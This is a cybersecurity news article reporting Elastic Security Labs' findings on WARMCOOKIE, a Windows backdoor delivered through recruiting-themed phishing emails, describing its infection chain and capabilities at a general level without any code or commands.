A new Windows backdoor named WARMCOOKIE has been discovered by cybersecurity researchers, deployed through a phishing campaign with a recruiting theme known as REF6127. This backdoor is capable of taking screenshots of the target computer, delivering additional malware payloads, and fingerprinting the system, posing a significant threat to organizations.
According to a statement from Elastic Security Labs to Cyber Security News, this malware provides threat actors with the ability to access targeted environments and deploy various types of malware on victims’ devices. The potential damage that can be caused by WARMCOOKIE is extensive, as it allows threat actors to gather sensitive information from victim’s computers and monitor their activities closely.
The execution flow of WARMCOOKIE involves phishing emails designed to lure recipients into clicking on a link that redirects them to a fake recruitment website. These emails are personalized, mentioning the recipient’s name and current employer to make the message seem more legitimate. Once the victim clicks on the link, they are directed to a landing page where they are asked to complete a CAPTCHA test to download a document. This document contains an obfuscated JavaScript file that, when executed, launches PowerShell and initiates the download and execution of the WARMCOOKIE backdoor.
Researchers have observed that threat actors behind WARMCOOKIE continuously create new landing pages using the IP address 45.9.74[.]135. These landing pages are tailored to target multiple hiring agencies and are optimized with industry-related keywords to attract victims. Before sending its first outgoing network request, the backdoor collects various system information, including the volume serial number, DNS domain of the victim machine, computer name, and username, to fingerprint the target system.
One of the key functionalities of WARMCOOKIE is its ability to capture screenshots from victims’ computers, enabling threat actors to gather sensitive information and monitor victim’s activities. Analysts also note that threat actors create new infrastructure and domains weekly to support these malicious campaigns. While there may be minor issues in the initial development of the malware, researchers believe that these will be addressed over time as threat actors continue to refine their tactics.
In conclusion, the discovery of the WARMCOOKIE backdoor highlights the evolving nature of cyber threats and the importance of robust cybersecurity measures to mitigate the risk of such attacks. Organizations are advised to remain vigilant against phishing emails and suspicious links, as well as to implement security solutions to detect and prevent the deployment of malware like WARMCOOKIE.